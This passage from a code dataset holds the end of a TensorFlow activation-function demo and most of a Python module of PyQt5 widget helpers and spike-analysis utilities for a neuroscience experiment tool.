fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(X, Y, Z, rstride=1, cstride=1)
#start a session
sess = tf.Session();
#create a simple input of 3 real values
i = tf.constant([1.0, 2.0, 3.0], shape=[1, 3])
#create a matrix of weights
w = tf.random_normal(shape=[3, 3])
#create a vector of biases
b = tf.random_normal(shape=[1, 3])
#dummy activation function
def func(x): return x
#tf.matmul will multiply the input(i) tensor and the weight(w) tensor then sum the result with the bias(b) tensor.
act = func(tf.matmul(i, w) + b)
#Evaluate the tensor to a numpy array
act.eval(session=sess)
# step function
plot_act(1.0, func)
# sigmoid function
plot_act(1, tf.sigmoid)
# using sigmoid in nn layer
act = tf.sigmoid(tf.matmul(i, w) + b)
act.eval(session=sess)
# tanh
plot_act(1, tf.tanh)
# using tanh in nn layer
act = tf.tanh(tf.matmul(i, w) + b)
act.eval(session=sess)
# relu
plot_act(1, tf.nn.relu)
# using relu in nn layer
act = tf.nn.relu(tf.matmul(i, w) + b)
act.eval(session=sess) |
983,718 | bed66adbbd4d1fdd403960c80ee77ee7aca51b6e | # module import
import os
import re
import sys
import copy
import functools
import math as m
import numpy as np
import pandas as pd
import pickle as p
import seaborn as sns
from numpy import ndarray
from skimage import measure
from numpy.matlib import repmat
import matplotlib.pyplot as plt
from fuzzywuzzy import fuzz, process
# matplotlib module import
from matplotlib.patches import Polygon
from matplotlib.text import Annotation
# pyqt5 module import
from PyQt5.QtGui import QFont, QFontMetrics, QColor
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (QGroupBox, QPushButton, QListWidget, QComboBox, QMenuBar, QProgressBar, QHeaderView,
QMenu, QAction, QLabel, QWidget, QLineEdit, QCheckBox, QMessageBox, QTableWidget,
QTabWidget, QTableWidgetItem, QHBoxLayout)
#
from scipy.optimize import curve_fit
from matplotlib.colors import to_rgba_array
import rpy2.robjects as ro
import rpy2.robjects.numpy2ri
from rpy2.robjects import FloatVector, BoolVector, StrVector, IntVector
from rpy2.robjects.packages import importr
from rpy2.robjects.functions import SignatureTranslatedFunction
rpy2.robjects.numpy2ri.activate()
# r-library import
r_stats = importr("stats")
r_pROC = importr("pROC")
#
_roc = r_pROC.roc
_ci_auc = SignatureTranslatedFunction(r_pROC.ci_auc,
init_prm_translate = {'boot_n': 'boot.n', 'conf_level': 'conf.level'})
_roc_test = SignatureTranslatedFunction(r_pROC.roc_test,
init_prm_translate = {'boot_n': 'boot.n'})
# lambda function declarations
lin_func = lambda x, a: a * x
lin_func_const = lambda x, a, b: a * x + b
spike_count_fcn = lambda t_sp: np.array([len(x) for x in t_sp])
swap_array = lambda x1, x2, is_swap: np.array([x if is_sw else y for x, y, is_sw in zip(x1, x2, is_swap)])
# combine_spike_freq = lambda sp_freq, i_dim: flat_list([list(sp_freq[i_filt][:, i_dim]) for i_filt in range(len(sp_freq))])
calc_rel_count = lambda x, n: np.array([sum(x == i) for i in range(n)])
convert_rgb_col = lambda col: to_rgba_array(np.array(col) / 255, 1)
sig_str_fcn = lambda x, p_value: '*' if x < p_value else ''
get_field = lambda wfm_para, f_key: np.unique(flat_list([list(x[f_key]) for x in wfm_para]))
# vectorisation function declarations
sp_freq = lambda x, t_phase: len(x) / t_phase if x is not None else 0
sp_freq_fcn = np.vectorize(sp_freq)
# unicode characters
_bullet_point = '\u2022'
_mu = '\u03bc'
_delta = '\u0394'
_plusminus = '\u00b1'
# other initialisations
t_wid_f = 0.99
n_plot_max = 25
dcopy = copy.deepcopy
is_linux = sys.platform == 'linux'
default_dir_file = os.path.join(os.getcwd(), 'default_dir.p')
_red, _black, _green = [140, 0, 0], [0, 0, 0], [47, 150, 0]
_blue, _gray, _light_gray, _orange = [0, 30, 150], [90, 90, 50], [200, 200, 200], [255, 110, 0]
_bright_red, _bright_cyan, _bright_purple = (249, 2, 2), (2, 241, 249), (245, 2, 249)
_bright_yellow = (249, 221, 2)
custom_col = [_bright_yellow, _bright_red, _bright_cyan, _bright_purple, _red,
_black, _green, _blue, _gray, _light_gray, _orange]
def flat_list(l):
'''
:param l:
:return:
'''
#
if len(l) == 0:
return []
elif isinstance(l[0], list) or isinstance(l[0], ndarray):
return [item for sublist in l for item in sublist]
else:
return l
def set_pvalue_string(p_value, p_lim=0.05):
'''
:param p_value:
:param p_lim:
:return:
'''
if p_value < 1e-20:
# case is the p-value is <1e-20. so use a fixed value instead
return '{:5.3e}*'.format(1e-20)
elif p_value < 1e-2:
# case is very small p-values, so use compact form
return '{:5.3e}{}'.format(p_value, sig_str_fcn(p_value, p_lim))
else:
# otherwise, use normal form
return '{:5.3f}{}'.format(p_value, sig_str_fcn(p_value, p_lim))
def calc_rel_prop(x, n, N=None, return_counts=False, ind=None):
'''
:param x:
:param n:
:param N:
:return:
'''
if ind is None:
ind = np.arange(n)
if return_counts:
return np.array([sum(x == i) for i in ind])
elif N is None:
return 100 * np.array([sum(x == i) for i in ind]) / len(x)
else:
return 0 if (N == 0) else 100 * np.array([sum(x == i) for i in ind]) / N
class CheckableComboBox(QComboBox):
def __init__(self, parent=None, has_all=False, first_line=None):
super(CheckableComboBox, self).__init__(parent)
self.view().pressed.connect(self.handleItemPressed)
self.n_item = 0
self.has_all = has_all
self.first_line = first_line
def addItem(self, item, can_check):
'''
:param item:
:param can_check:
:return:
'''
super(CheckableComboBox, self).addItem(item)
item = self.model().item(self.count()-1,0)
self.n_item += 1
if can_check:
# item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)
item.setFlags(Qt.ItemIsEnabled)
item.setCheckState(Qt.Unchecked)
else:
item.setFlags(Qt.NoItemFlags)
# def itemChecked(self, index):
# item = self.model().item(index, 0)
# return item.checkState() == Qt.Checked
def getSelectedItems(self):
'''
:return:
'''
# initialisations
txt_sel = []
# retrieves the checkbox text for selected items
for i in range(self.count()):
item = self.model().item(i)
if item.checkState() == Qt.Checked:
txt_sel.append(item.text())
# returns the selected text
return txt_sel
def setState(self, index, state):
'''
:param index:
:param state:
:return:
'''
# retrieves the item corresponding to the current index
if (index == 0) and (self.first_line is not None):
return
item = self.model().item(index)
item.setCheckState(Qt.Checked if state else Qt.Unchecked)
def handleItemPressed(self, index, is_checked=None):
'''
:param index:
:param is_checked:
:return:
'''
#
if (index == 0) and (self.first_line is not None):
return
#
if isinstance(index, int):
item, i_sel = self.model().item(index), index
else:
item = self.model().itemFromIndex(index)
i_sel = item.row()
#
if is_checked is None:
is_checked = (item.checkState() == Qt.Checked)
item.setCheckState(Qt.Unchecked if is_checked else Qt.Checked)
#
if (i_sel == 1) and self.has_all:
for i_item in range(2, self.n_item):
item_new = self.model().item(i_item)
if is_checked:
item_new.setFlags(Qt.ItemIsEnabled)
else:
item_new.setCheckState(Qt.Unchecked)
item_new.setFlags(Qt.NoItemFlags)
#########################################
#### OBJECT PROPERTY FUNCTIONS ####
#########################################
def create_font_obj(size=8, is_bold=False, font_weight=QFont.Normal):
'''
:param is_bold:
:param font_weight:
:return:
'''
# creates the font object
font = QFont()
# sets the font properties
font.setPointSize(size)
font.setBold(is_bold)
font.setWeight(font_weight)
# returns the font object
return font
def update_obj_font(h_obj, pointSize=8, weight=QFont.Normal):
'''
:param hObj:
:param pointSize:
:param weight:
:return:
'''
mainFont = h_obj.font().family()
qF = QFont(mainFont, pointSize=pointSize, weight=weight)
h_obj.setFont(qF)
def set_obj_fixed_size(h_obj, width=None, height=None, fix_size=True):
'''
'''
# retrieves the suggested object object size
obj_sz = h_obj.sizeHint()
if width is None:
width = obj_sz.width()
if height is None:
height = obj_sz.height()
# resets the object size
if fix_size:
h_obj.setFixedSize(width, height)
else:
h_obj.resize(width, height)
def set_text_colour(text, col='black'):
'''
:param text:
:param col:
:return:
'''
return '<span style="color:{0}">{1}</span>'.format(col, text)
#####################################################
#### PYQT5 OBJECT INITIALISATION FUNCTIONS ####
#####################################################
def create_groupbox(parent, dim, font, title, name=None):
'''
:param parent:
:param dim:
:param font:
:param name:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the groupbox object
h_group = QGroupBox(parent)
# sets the object properties
h_group.setGeometry(dim)
h_group.setFont(font)
h_group.setTitle(title)
# sets the object name (if provided)
if name is not None:
h_group.setObjectName(name)
# returns the group object
return h_group
def create_label(parent, font, text, dim=None, name=None, align='left'):
'''
:param parent:
:param dim:
:param font:
:param text:
:param name:
:param align:
:return:
'''
# creates the label object
h_lbl = QLabel(parent)
# sets the label properties
h_lbl.setFont(font)
h_lbl.setText(text)
# set the object dimensions (if not None)
if dim is not None:
h_lbl.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_lbl.setObjectName(name)
# sets the horizontal alignment of the label
if align == 'centre':
h_lbl.setAlignment(Qt.AlignCenter)
elif align == 'left':
h_lbl.setAlignment(Qt.AlignLeft)
else:
h_lbl.setAlignment(Qt.AlignRight)
# returns the label object
return h_lbl
def create_edit(parent, font, text, dim=None, name=None, cb_fcn=None, align='centre'):
'''
:param font:
:param text:
:param dim:
:param parent:
:param name:
:param cb_fcn:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the editbox object
h_edit = QLineEdit(parent)
# sets the label properties
h_edit.setFont(font)
h_edit.setText(text)
# sets the object name (if provided)
if name is not None:
h_edit.setObjectName(name)
# set the object dimensions (if not None)
if dim is not None:
h_edit.setGeometry(dim)
# sets the horizontal alignment of the label
if align == 'centre':
h_edit.setAlignment(Qt.AlignCenter)
elif align == 'left':
h_edit.setAlignment(Qt.AlignLeft)
else:
h_edit.setAlignment(Qt.AlignRight)
# sets the callback function (if provided)
if cb_fcn is not None:
h_edit.editingFinished.connect(cb_fcn)
# returns the object
return h_edit
def create_button(parent, dim, font, text, name=None, icon=None, tooltip=None, cb_fcn=None):
'''
:param dim:
:param font:
:param name:
:param icon:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the button object
h_button = QPushButton(parent)
# sets the button properties
h_button.setFont(font)
h_button.setText(text)
#
if dim is not None:
h_button.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_button.setObjectName(name)
# sets the icon (if provided)
if icon is not None:
h_button.setIcon(icon)
# sets the tooltip string (if provided)
if tooltip is not None:
h_button.setToolTip(tooltip)
# sets the callback function (if provided)
if cb_fcn is not None:
h_button.clicked.connect(cb_fcn)
# returns the button object
return h_button
def create_checkbox(parent, font, text, dim=None, name=None, state=False, cb_fcn=None):
'''
:param parent:
:param dim:
:param font:
:param text:
:param name:
:param state:
:param cb_fcn:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the listbox object
h_chk = QCheckBox(parent)
#
h_chk.setText(text)
h_chk.setFont(font)
h_chk.setChecked(state)
# set the object dimensions (if not None)
if dim is not None:
h_chk.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_chk.setObjectName(name)
# sets the callback function
if cb_fcn is not None:
h_chk.stateChanged.connect(cb_fcn)
# returns the checkbox object
return h_chk
def create_listbox(parent, dim, font, text, name=None, cb_fcn=None):
'''
:param parent:
:param dim:
:param text:
:param name:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the listbox object
h_list = QListWidget(parent)
# sets the listbox object properties
h_list.setFont(font)
# set the object dimensions (if not None)
if dim is not None:
h_list.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_list.setObjectName(name)
# sets the callback function (if provided)
if cb_fcn is not None:
h_list.itemSelectionChanged.connect(cb_fcn)
# sets the listbox text (if provided)
if text is not None:
for t in text:
h_list.addItem(t)
# returns the listbox object
return h_list
def create_progressbar(parent, dim, font, text=None, init_val=0, name=None, max_val=100.0):
'''
:param parent:
:param font:
:param text:
:param dim:
:param init_val:
:param name:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the listbox object
h_pbar = QProgressBar(parent)
# sets the listbox object properties
h_pbar.setGeometry(dim)
h_pbar.setFont(font)
h_pbar.setValue(init_val)
h_pbar.setMaximum(max_val)
# sets the object name (if provided)
if name is not None:
h_pbar.setObjectName(name)
# removes the text if not provided
if text is None:
h_pbar.setTextVisible(False)
# returns the progressbar object
return h_pbar
def create_combobox(parent, font, text, dim=None, name=None, cb_fcn=None):
'''
:param parent:
:param dim:
:param font:
:param list:
:param name:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the listbox object
h_combo = QComboBox(parent)
# sets the combobox object properties
h_combo.setFont(font)
# sets the object dimensions (if provided)
if dim is not None:
h_combo.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_combo.setObjectName(name)
# sets the combobox text (if provided)
if text is not None:
for t in text:
h_combo.addItem(t)
# sets the callback function (if provided)
if cb_fcn is not None:
h_combo.currentIndexChanged.connect(cb_fcn)
# returns the listbox object
return h_combo
def create_checkcombo(parent, font, text, dim=None, name=None, cb_fcn=None,
first_line='--- Select From Options List Below ---', has_all=False):
'''
:param parent:
:param font:
:param combo_opt:
:param dim:
:param name:
:param cb_fcn:
:param combo_fcn:
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the listbox object
h_chkcombo = CheckableComboBox(parent, has_all, first_line)
# sets the combobox object properties
h_chkcombo.setFont(font)
# sets the object dimensions (if provided)
if dim is not None:
h_chkcombo.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_chkcombo.setObjectName(name)
# sets the combobox text (if provided)
if text is not None:
if first_line is not None:
text = [first_line] + text
for i, t in enumerate(text):
h_chkcombo.addItem(t, i>0)
# sets the callback function (if provided)
if cb_fcn is not None:
h_chkcombo.view().pressed.connect(cb_fcn)
# returns the listbox object
return h_chkcombo
def create_table(parent, font, data=None, col_hdr=None, row_hdr=None, n_row=None, dim=None, name=None,
cb_fcn=None, combo_fcn=None, max_disprows=3, check_col=None, check_fcn=None, exc_rows=None):
'''
:param parent:
:param font:
:param col_hdr:
:param row_hdr:
:param n_row:
:param dim:
:param name:
:param cb_fcn:
:param combo_fcn:
:return:
'''
#
n_col = len(col_hdr)
if n_row is None:
n_row = max_disprows
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the table object
h_table = QTableWidget(parent)
# sets the object properties
h_table.setRowCount(n_row)
h_table.setColumnCount(n_col)
h_table.setFont(font)
if col_hdr is not None:
h_table.setHorizontalHeaderLabels(col_hdr)
if row_hdr is not None:
h_table.setVerticalHeaderLabels(row_hdr)
# sets the object dimensions (if provided)
if dim is not None:
h_table.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_table.setObjectName(name)
# sets the callback function (if provided)
if cb_fcn is not None:
h_table.cellChanged.connect(cb_fcn)
# sets the table dimensions
h_table.setMaximumHeight(20 + min(max_disprows, n_row) * 22)
h_table.resizeRowsToContents()
# sets the table headers
h_hdr = h_table.horizontalHeader()
for i_col in range(len(col_hdr)):
h_hdr.setSectionResizeMode(i_col, QHeaderView.Stretch)
#
if data is not None:
for i_row in range(n_row):
for i_col in range(n_col):
if check_col is not None:
if i_col in check_col:
# creates the checkbox widget
h_chk = QCheckBox()
h_chk.setCheckState(Qt.Checked if data[i_row, i_col] else Qt.Unchecked)
if check_fcn is not None:
check_fcn_full = functools.partial(check_fcn, i_row, i_col)
h_chk.stateChanged.connect(check_fcn_full)
# creates the widget object
h_cell = QWidget()
h_layout = QHBoxLayout(h_cell)
h_layout.addWidget(h_chk)
h_layout.setAlignment(Qt.AlignCenter)
h_layout.setContentsMargins(0, 0, 0, 0)
h_cell.setLayout(h_layout)
# if the row is excluded
if exc_rows is not None:
if i_row in exc_rows:
item = QTableWidgetItem('')
item.setBackground(QColor(200, 200, 200))
h_table.setItem(i_row, i_col, item)
h_cell.setEnabled(False)
# continues to the next column
h_table.setCellWidget(i_row, i_col, h_cell)
continue
# retrieves the current cell object and determines if is a combobox object
item = QTableWidgetItem(data[i_row, i_col])
# resets the background colour (if the row is excluded)
if exc_rows is not None:
if i_row in exc_rows:
item.setBackground(QColor(200, 200, 200))
# adds the item to the table
item.setTextAlignment(Qt.AlignHCenter)
h_table.setItem(i_row, i_col, item)
# # if the column is checkable, then modify the cell item properties
# if check_col is not None:
# if i_col in check_col:
# item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)
# item.setCheckState(Qt.Checked if data[i_row, i_col] else Qt.Unchecked)
# returns the table object
return h_table
def create_tablecombo(parent, font, combo_opt, col_hdr=None, row_hdr=None, n_row=None,
dim=None, name=None, cb_fcn=None, combo_fcn=None):
'''
:param parent:
:param font:
:param col_hdr:
:param combo_opt:
:param dim:
:param name:
:param cb_fcb:
:return:
'''
#
if n_row is None:
n_row = 3
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the table object
h_table = QTableWidget(parent)
# sets the object properties
h_table.setRowCount(n_row)
h_table.setColumnCount(len(col_hdr))
h_table.setFont(font)
# sets the
for opt_col in combo_opt:
for i_row in range(n_row):
# sets the combobox callback function (if provided)
if combo_fcn is None:
cb_fcn_combo = None
else:
cb_fcn_combo = functools.partial(combo_fcn[0], combo_fcn[1], h_table, i_row, opt_col)
# creates the combo-box object
h_combocell = create_combobox(h_table, font, combo_opt[opt_col], cb_fcn=cb_fcn_combo)
# creates the combobox object and fills in the options
h_table.setCellWidget(i_row, opt_col, h_combocell)
if col_hdr is not None:
h_table.setHorizontalHeaderLabels(col_hdr)
if row_hdr is not None:
h_table.setVerticalHeaderLabels(row_hdr)
# sets the object dimensions (if provided)
if dim is not None:
h_table.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_table.setObjectName(name)
# sets the callback function (if provided)
if cb_fcn is not None:
h_table.cellChanged.connect(cb_fcn)
#
h_table.setMaximumHeight(20 + min(3, n_row) * 22)
h_table.resizeRowsToContents()
h_hdr = h_table.horizontalHeader()
for i_col in range(len(col_hdr)):
h_hdr.setSectionResizeMode(i_col, QHeaderView.Stretch)
# returns the table object
return h_table
def create_tab(parent, dim, font, h_tabchild=None, child_name=None, name=None, cb_fcn=None):
'''
:return:
'''
# creates a default font object (if not provided)
if font is None:
font = create_font_obj()
# creates the tab object
h_tab = QTabWidget(parent)
# sets the listbox object properties
h_tab.setGeometry(dim)
h_tab.setFont(font)
# adds any children widgets (if provided)
if (h_tabchild is not None) and (child_name is not None):
for h_tc, c_n in zip(h_tabchild, child_name):
h_tab.addTab(h_tc, c_n)
# sets the object name (if provided)
if name is not None:
h_tab.setObjectName(name)
# sets the tab changed callback function (if provided)
if cb_fcn is not None:
h_tab.currentChanged.connect(cb_fcn)
# returns the tab object
return h_tab
def create_menubar(parent, dim, name=None):
'''
:param parent:
:param dim:
:param name:
:return:
'''
# creates the menubar object
h_menubar = QMenuBar(parent)
# sets the menubar properties
h_menubar.setGeometry(dim)
# sets the object name (if provided)
if name is not None:
h_menubar.setObjectName(name)
# returns the menubar object
return h_menubar
def create_menu(parent, title, name=None):
'''
:param parent:
:param title:
:param name:
:return:
'''
# creates the menu item
h_menu = QMenu(parent)
# sets the menu properties
h_menu.setTitle(title)
# sets the object name (if provided)
if name is not None:
h_menu.setObjectName(name)
# returns the menu object
return h_menu
def create_menuitem(parent, text, name=None, cb_fcn=None, s_cut=None):
'''
:param parent:
:param title:
:param name:
:return:
'''
# creates the menu item object
h_menuitem = QAction(parent)
# sets the menuitem properties
h_menuitem.setText(text)
# sets the object name (if provided)
if name is not None:
h_menuitem.setObjectName(name)
# sets the callback function (if provided)
if cb_fcn is not None:
h_menuitem.triggered.connect(cb_fcn)
# sets the callback function (if provided)
if s_cut is not None:
h_menuitem.setShortcut(s_cut)
# returns the menu item
return h_menuitem
def delete_widget_children(h_grp):
'''
:param h_grp:
:return:
'''
# deletes all widgets that are children to the groupbox object
for hh in h_grp.findChildren(QWidget):
hh.deleteLater()
#######################################
#### MISCELLANEOUS FUNCTIONS ####
#######################################
def set_file_name(f_name, f_type):
'''
:param f_name:
:param f_type:
:return:
'''
f_type_ex = re.search('\(([^)]+)', f_type).group(1)
if f_type_ex[1:] not in f_name:
return '{0}.{1}'.format(f_name, f_type_ex[1:])
else:
return f_name
def check_edit_num(nw_str, is_int=False, min_val=-1e100, max_val=1e10, show_err=True):
'''
:param nw_str:
:param is_int:
:return:
'''
# initialisations
nw_val, e_str = None, None
if is_int:
# case is the string must be a float
try:
nw_val = int(nw_str)
except:
try:
# if there was an error, then determine if the string was a float
nw_val = float(nw_str)
if nw_val % 1 == 0:
# if the float is actually an integer, then return the value
nw_val, e_str = int(nw_val), 1
else:
# otherwise,
e_str = 'Entered value is not an integer.'
except:
# case is the string was not a valid number
e_str = 'Entered value is not a valid number.'
else:
# case is the string must be a float
try:
nw_val = float(nw_str)
except:
# case is the string is not a valid number
e_str = 'Entered value is not a valid number.'
# determines if the new value meets the min/max value requirements
if nw_val is not None:
if nw_val < min_val:
e_str = 'Entered value must be greater than or equal to {0}'.format(min_val)
elif nw_val > max_val:
e_str = 'Entered value must be less than or equal to {0}'.format(max_val)
else:
return nw_val, e_str
# shows the error message (if required)
if show_err:
show_error(e_str, 'Error!')
# shows the error and returns a None value
return None, e_str
def expand_dash_number(num_str):
'''
:param x:
:return:
'''
if '-' in num_str:
if num_str.count('-') > 1:
return 'NaN'
else:
i_dash = num_str.index('-')
return [str(x) for x in list(range(int(num_str[0:i_dash]),int(num_str[(i_dash+1):])+1))]
else:
return [num_str]
def calc_text_width(font, text, w_ofs=0):
'''
:param font:
:param text:
:return:
'''
# creates the font metrics object
fm = QFontMetrics(font)
# returns the text width based on the type
if isinstance(text, list):
# case is a list, so return the maximum width of all text strings
return max([fm.width(t) for t in text]) + w_ofs
else:
# otherwise, return the width of the text string
return fm.width(text) + w_ofs
def det_subplot_dim(n_plot):
'''
:param n_plot:
:return:
'''
#
return m.ceil(0.5 * (1 + m.sqrt(1 + 4 * n_plot))) - 1, m.ceil(m.sqrt(n_plot))
def setup_index_arr(ind, n_ele):
'''
sets the index arrays for the unique groups
'''
# memory allocation
ind_grp = np.zeros(len(ind), dtype=object)
# sets the indices of the sub-groups
for i in range(len(ind)):
if i == (len(ind) - 1):
ind_grp[i] = np.array(range(ind[i], n_ele))
else:
ind_grp[i] = np.array(range(ind[i], ind[i+1]))
# returns the index array
return ind_grp
def show_error(text, title):
'''
:param text:
:param title:
:return:
'''
# otherwise, create the error message
err_dlg = QMessageBox()
err_dlg.setText(text)
err_dlg.setWindowTitle(title)
err_dlg.setWindowFlags(Qt.WindowStaysOnTopHint)
# shows the final message
err_dlg.exec()
def get_index_groups(b_arr):
'''
:param b_arr:
:return:
'''
if not any(b_arr):
return []
else:
labels = measure.label(b_arr)
return [np.where(labels == (i + 1))[0] for i in range(max(labels))]
def expand_index_groups(i_grp, n_exp, n_max):
'''
:param i_grp:
:param n_exp:
:param n_max:
:return:
'''
if len(i_grp):
for i in range(len(i_grp)):
i_grp[i] = np.arange(max(0, i_grp[i][0] - n_exp), min(n_max, i_grp[i][-1] + (n_exp + 1)))
return i_grp
def det_largest_index_group(b_arr):
'''
:param b_arr:
:return:
'''
# determines the index groups from the binary array
i_grp = get_index_groups(b_arr)
# returns the largest group of all the index groups
return i_grp[np.argmax([len(x) for x in i_grp])]
def set_binary_groups(sz, ind):
'''
:param sz:
:param ind:
:return:
'''
if not isinstance(ind, list):
ind = [ind]
b_arr = np.zeros(sz, dtype=bool)
for i in range(len(ind)):
b_arr[ind[i]] = True
# returns the final binary array
return b_arr
def extract_file_name(f_file):
'''
:param f_name:
:return:
'''
if '.' in f_file:
f_name = os.path.basename(f_file)
return f_name[:f_name.rfind('.')]
else:
return f_file
def extract_file_extn(f_file):
'''
:param f_name:
:return:
'''
if '.' in f_file:
f_name = os.path.basename(f_file)
return f_name[f_name.rfind('.'):]
else:
return ''
def get_expt_index(exp_name, cluster, ind_arr=None):
'''
:param exp_name:
:param cluster:
:return:
'''
# returns the index of the experiment corresponding to the experiment with name, exp_name
i_expt = next(i for i in range(len(cluster)) if exp_name.lower() in extract_file_name(cluster[i]['expFile']).lower())
if ind_arr is None:
return i_expt
else:
return np.where(np.where(ind_arr)[0] == i_expt)[0][0]
def get_para_dict(fcn_para, f_type):
'''
:return:
'''
return [p for p in fcn_para if fcn_para[p]['gtype'] == f_type]
def set_group_enabled_props(h_groupbox, is_enabled=True):
'''
:param h_groupbox:
:return:
'''
for h_obj in h_groupbox.findChildren(QWidget):
h_obj.setEnabled(is_enabled)
if isinstance(h_obj, QGroupBox):
set_group_enabled_props(h_obj, is_enabled)
def init_general_filter_data():
'''
:return:
'''
f_data = {
'region_name': [],
'record_layer': [],
'free_ctype': [],
'lesion': [],
'record_state': [],
}
# returns the field data
return f_data
def init_rotation_filter_data(is_ud, is_empty=False):
'''
:return:
'''
# initialisations
t_type0 = [['Black'], ['UniformDrifting']]
t_key = {
't_type': None,
'sig_type': None,
'match_type': None,
'region_name': None,
'record_layer': None,
'record_coord': None,
'lesion': None,
'record_state': None,
't_freq': {'0.5': '0.5 Hz', '2.0': '2 Hz', '4.0': '4 Hz'},
't_freq_dir': {'-1': 'CW', '1': 'CCW'},
't_cycle': {'15': '15 Hz', '120': '120 Hz'},
'free_ctype': None,
}
if is_empty:
f_data = {
't_type': [],
'sig_type': [],
'match_type': [],
'region_name': [],
'record_layer': [],
'record_coord': [],
'lesion': [],
'record_state': [],
't_freq': [],
't_freq_dir': [],
't_cycle': [],
'free_ctype': [],
'is_ud': [is_ud],
't_key': t_key,
}
else:
f_data = {
't_type': t_type0[int(is_ud)],
'sig_type': ['All'],
'match_type': ['All'],
'region_name': ['All'],
'record_layer': ['All'],
'record_coord': ['All'],
'lesion': ['All'],
'record_state': ['All'],
'record_data': ['All'],
't_freq': ['All'],
't_freq_dir': ['All'],
't_cycle': ['All'],
'free_ctype': ['All'],
'is_ud': [is_ud],
't_key': t_key,
}
# returns the field data
return f_data
def get_plot_col(n_plot=1, i_ofs=0):
'''
:param index:
:return:
'''
def get_new_colour(index):
#
if index < 10:
return 'C{0}'.format(index)
else:
return convert_rgb_col(custom_col[index-10])[0]
c = []
for i_plot in range(n_plot):
c.append(get_new_colour(i_plot+i_ofs))
return c
def det_valid_rotation_expt(data, is_ud=False, t_type=None, min_count=2):
'''
:return:
'''
# determines which experiments has rotational analysis information associated with them
is_valid = [x['rotInfo'] is not None for x in data._cluster]
if is_ud:
# if experiment is uniform drifting, determine if these trials were performed
is_valid = [('UniformDrifting' in x['rotInfo']['trial_type'])
if y else False for x, y in zip(data._cluster, is_valid)]
elif t_type is not None:
# if the trial types are given, then ensure that at least 2 trial types are within the experiment
is_valid = [sum([z in x['rotInfo']['trial_type'] for z in t_type]) >= min_count
if y else False for x, y in zip(data._cluster, is_valid)]
# returns the array
return is_valid
def det_valid_vis_expt(data, is_vis_only=False):
'''
:param data:
:return:
'''
# determines if there are any valid uniform/motor drifting experiments currently loaded
has_ud_expt = any(det_valid_rotation_expt(data, True))
has_md_expt = any(det_valid_rotation_expt(data, t_type=['MotorDrifting'], min_count=1))
# returns the boolean flags
if is_vis_only:
return has_ud_expt or has_md_expt
else:
return has_ud_expt or has_md_expt, has_ud_expt, has_md_expt
def set_axis_limits(ax, x_lim, y_lim):
'''
:param ax:
:param x_lim:
:param y_lim:
:return:
'''
ax.set_xlim(x_lim)
ax.set_ylim(y_lim)
def set_equal_axis_limits(ax, ind):
'''
:param ax:
:param ind:
:return:
'''
# initialisations
xL, yL = [1e6, -1e6], [1e6, -1e6]
# determines the overall x/y limits over the axis indices
for i in ind:
# retrieves the x/y axis limits
x_lim, y_lim = ax[i].get_xlim(), ax[i].get_ylim()
# determines the min/max limits from the
xL[0], xL[1] = min(xL[0], x_lim[0]), max(xL[1], x_lim[1])
yL[0], yL[1] = min(yL[0], y_lim[0]), max(yL[1], y_lim[1])
# resets the axis limits
xx = [min(xL[0], yL[0]), max(xL[1], yL[1])]
for i in ind:
set_axis_limits(ax[i], xx, xx)
def reset_plot_axes_limits(ax, ax_lim, ax_str, is_high):
'''
:param ax_lim:
:param ax_str:
:param is_low:
:return:
'''
if ax_str == 'x':
axL = list(ax.get_xlim())
axL[is_high] = ax_lim
ax.set_xlim(axL)
elif ax_str == 'y':
axL = list(ax.get_ylim())
axL[is_high] = ax_lim
ax.set_ylim(axL)
else:
axL = list(ax.get_zlim())
axL[is_high] = ax_lim
ax.set_zlim(axL)
def combine_nd_arrays(A, B, dim=1, dim_append=0):
'''
:param A0:
:param A:
:return:
'''
# if the original array is empty, then return the new array
if A is None:
return B
#
n_szA, n_szB = np.shape(A), np.shape(B)
# appends columns to the original/new arrays if they are not the correct size
if n_szA[dim] > n_szB[dim]:
# if the new
d_dim = n_szA[dim] - n_szB[dim]
Bnw = np.empty([x if i != dim else d_dim for i, x in enumerate(n_szB)], dtype=object)
B = np.append(B, Bnw, axis=dim)
elif n_szA[dim] < n_szB[dim]:
d_dim = n_szB[dim] - n_szA[dim]
Anw = np.empty([x if i != dim else d_dim for i, x in enumerate(n_szA)], dtype=object)
A = np.append(A, Anw, axis=dim)
# returns the arrays appended across the rows
return np.append(A, B, axis=dim_append)
def create_general_group_plot(ax, y_plt, grp_plot_type, col):
'''
:param ax:
:param y_plt:
:param grp_plot_type:
:param col:
:return:
'''
# creates the plot based on type
if grp_plot_type == 'Stacked Bar':
# case is a stacked bar plot
return create_stacked_bar(ax, y_plt, col)
else:
# initialisations
n_grp, n_type = len(y_plt), np.shape(y_plt[0])[1]
xi_type = np.arange(n_type)
if grp_plot_type in ['Violin/Swarmplot', 'Violinplot']:
# initialisations
vl_col = {}
x1, x2, y = [], [], []
# sets the pallete colours for each type
for i_type in range(n_type):
vl_col[i_type] = col[i_type]
for i_grp in range(n_grp):
# sets the violin/swarmplot dictionaries
x1.append([i_grp] * np.prod(y_plt[i_grp].shape))
